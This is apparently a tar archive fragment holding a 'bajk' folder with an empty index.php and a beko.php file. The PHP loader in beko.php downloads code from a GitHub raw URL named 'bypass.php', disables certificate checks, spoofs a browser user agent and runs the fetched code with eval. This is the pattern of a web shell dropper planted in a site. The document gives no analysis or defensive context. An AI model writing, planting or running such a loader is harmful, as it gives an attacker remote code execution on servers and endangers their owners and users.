bajk/index.php                                                                                      0000644                 00000000001 15100544616 0007264 0                                                                                                    ustar 00                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       bajk/beko.php                                                                                       0000644                 00000001062 15100544616 0007105 0                                                                                                    ustar 00                                                                                                                                                                                                                                                       <?php
function getRemotePHP($url) {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        CURLOPT_SSL_VERIFYPEER => false,
    ]);
    $code = curl_exec($ch);
    curl_close($ch);
    if (!$code) {
        die('Gagal ambil file dari URL Cok :(.');
    }
    eval("?>$code");
}
getRemotePHP('https://raw.githubusercontent.com/wawanbangke/ggo/refs/heads/main/bypass.php');
?>